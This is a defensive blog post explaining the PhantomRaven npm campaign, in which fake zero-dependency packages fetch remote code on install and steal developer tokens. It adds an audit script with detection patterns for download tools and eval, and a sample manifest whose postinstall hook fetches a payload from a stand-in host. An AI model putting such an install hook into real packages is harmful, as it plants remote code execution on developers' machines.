Greetings! If you utilize npm-related projects, you will want to learn about this. The npm world has seen a new attack called PhantomRaven; this attack’s purpose is to steal users’ authentication details, tokens, and secrets, and you should take it seriously. Does this sound serious? We will explain this in more details here.
What exactly is PhantomRaven?
PhantomRaven is a large hacking campaign in which over 120 malicious npm packages have been uploaded to the registry. These malicious packages were published under fabricated developer accounts and have been downloaded more than 86,000 times!
So what’s the point? PhantomRaven’s malicious packages impersonate normal npm packages and steal your authentication details once they are installed and you log in. These details include:
• GitHub and GitLab tokens
• npm auth tokens
• CI/CD user secrets (e.g. Jenkins and CircleCI).
The malicious packages also declare zero dependencies (so they appear legitimate), and while the install runs they download hidden malware hosted elsewhere on the internet. This makes the attack immensely hard to detect at first glance.
Smart, right? But also risky.
Why This Is Serious
Have you ever put an npm package in your code without reading it closely? Yeah, we’ve all done it. But this attack shows us why that’s bad.
If a developer innocently installs one of these fake packages, the attacker can steal your secret API keys, take over your project, or pull malicious code into your code base!
And with npm being heavily used in thousands of projects across the internet, one bad package can easily spread consequences to hundreds of applications.
How PhantomRaven Works
So here’s how they pulled it off (a simple breakdown):
- They upload a fake npm package with no dependencies so it “looks” clean.
- When you install it, it simply downloads a file remotely.
- That hidden code collects information, such as tokens, emails, API keys, and whatever else it can find on your computer.
- The stolen tokens/information are then sent to the attackers over the internet.
How You Can Stay Safe
Here are some things you can do right now:
- Review every npm package you're using — especially new or unfamiliar ones.
- Don't trust package names that look even slightly unexpected.
- Limit the secrets available to your systems and accounts.
- Use 2FA (two-factor authentication) for npm and GitHub.
- Only stick to trusted developers and verified packages.
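One concrete way to do the "review every package" step against the two warning signs described above (an install-time script that fetches remote code, and a package that declares no dependencies at all). This is an added example, not code from the PhantomRaven write-up; the package names and URL in the sample manifests are constructed, and the patterns it looks for are assumptions about what a remote-download install hook usually looks like.

```javascript
// Added example: audit a parsed package.json for PhantomRaven-style signals.
// Run with: node audit.js   (or paste the manifest you want to check)

// Lifecycle hooks npm runs automatically during `npm install` of a dependency.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Patterns (assumed heuristics) that suggest the hook reaches out to the
// network or runs an inline payload instead of a file shipped in the tarball.
const SUSPICIOUS = [
  { re: /https?:\/\//i, why: "fetches a remote URL" },
  { re: /\b(curl|wget)\b/i, why: "invokes a download tool" },
  { re: /\b(node|sh|bash)\s+-[ec]\b/i, why: "runs an inline command string" },
  { re: /\beval\s*\(/i, why: "uses eval()" },
];

// Returns a list of human-readable findings for one parsed package.json.
function auditManifest(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    for (const { re, why } of SUSPICIOUS) {
      if (re.test(cmd)) findings.push(`${hook} script ${why}: ${cmd}`);
    }
  }
  // The article's second signal: no declared dependencies, yet it still runs
  // code at install time. On its own zero deps is normal; combined it is not.
  const depCount = Object.keys(pkg.dependencies || {}).length;
  if (depCount === 0 && findings.length > 0) {
    findings.push("declares zero dependencies but runs an install hook");
  }
  return findings;
}

// Constructed sample manifests (hypothetical names, not real packages).
const benign = {
  name: "example-benign", version: "1.0.0",
  dependencies: { lodash: "^4.17.21" },
  scripts: { test: "node test.js" },
};
const suspicious = {
  name: "example-suspicious", version: "1.0.0",
  dependencies: {},
  scripts: { postinstall: "node -e \"require('http').get('http://example.invalid/payload.js')\"" },
};

for (const pkg of [benign, suspicious]) {
  const findings = auditManifest(pkg);
  console.log(`${pkg.name}: ${findings.length ? findings.join("; ") : "no findings"}`);
}
```

To check a real package before installing it, feed the object returned by `JSON.parse` of its package.json into `auditManifest`, and remember that `npm install --ignore-scripts` stops these hooks from running at all.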
Final Thoughts
The PhantomRaven attack is a reminder that "safe-looking" packages may be anything but. Always confirm that what you are about to install is safe.
The next time you type npm install, ask yourself — "Am I positive this is clean?"
Stay vigilant, stay smart, and keep your code safe — one tiny check could save you from a big headache later on!